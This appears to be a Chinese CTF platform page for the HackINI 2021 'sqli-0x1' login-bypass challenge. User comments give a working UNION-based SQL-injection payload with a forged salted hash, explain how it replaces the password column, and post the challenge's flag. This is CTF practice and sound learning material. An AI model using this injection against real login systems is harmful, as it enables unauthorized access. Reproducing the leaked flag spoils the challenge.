sqli-0x1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2197
提  示: shellmates{********}
描  述:

SQL injections are still a problem yes, even in 2021.
Bypass the login mechanism and get access to the admin area.

...
登录回复
评论
Zpfhh 1月前
举报

用POST请求这个payload:user=a'union%09select%092,'7d0515bb9407af379e2ab13a58ee470d1f8815f56ffffa07ee5c0136e00fea0d$ttack'--+&pass=hacka 用HackBar工具秒解

回复 0
cfggfbfxdgbb 1月前
举报

我的wp: https://blog.csdn.net/cfggbfxdgbb/article/details/155936538?spm=1001.2014.3001.5502

回复 0
hengdonghui 1月前
举报

格式是: shellmates{********} 不是flag{******}格式。

回复 0
白乐 2月前
举报

如何知道它是SHA-256加密的呢,以及它是如何排列的呢

回复 0
L0GAN 1月前
举报

/?pls_help,审计代码

回复 0
Alune 2月前
举报

加盐密码哈希

回复 0
15031597817 4月前
举报

这个登上以后不出flag咋办

回复 1
a543589796 5月前
举报

这道题为什么sqlmap跑不出来啊?

回复 0
lunarbyside 8月前
举报

user=1'union select 1,'你的密码与你的盐值拼接后的字符串计算的哈希值$你的盐值&pass=你的密码。第一列为用户名username,第二列为密码password。由于查询不到用户“1”,所以查询返回的结果被union后面的值替代,第二列password值会被替换为你的哈希值和你的盐值,你就能用自己的密码登录啦☺

回复 4
Systems 1年前
举报

http://49.232.142.230:12520/?pls_help 源代码大家直接代码审计

回复 4
33555 1年前
举报

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

WriteUp

image
a2cai

2 金币

立即查看

评分(28)

解题动态

鲫鱼豆腐虾 攻破了该题 6小时前
YuHe 攻破了该题 6小时前
磊诺 攻破了该题 6小时前
yeting 攻破了该题 7小时前
hello word 攻破了该题 3天前
jsbba 攻破了该题 4天前
欲语泪先流 攻破了该题 4天前
DJJJ 攻破了该题 4天前
恐龙抗狼 攻破了该题 5天前
2kniden 攻破了该题 5天前
蛋总 攻破了该题 6天前
1424661428 攻破了该题 6天前
虫二11 攻破了该题 7天前
nationald 攻破了该题 7天前
hh20251231 攻破了该题 8天前
bhcxzhdsa 攻破了该题 8天前
asfwefcwded 攻破了该题 8天前
2氮 攻破了该题 8天前
david666 攻破了该题 8天前
18221703408 攻破了该题 8天前
问题反馈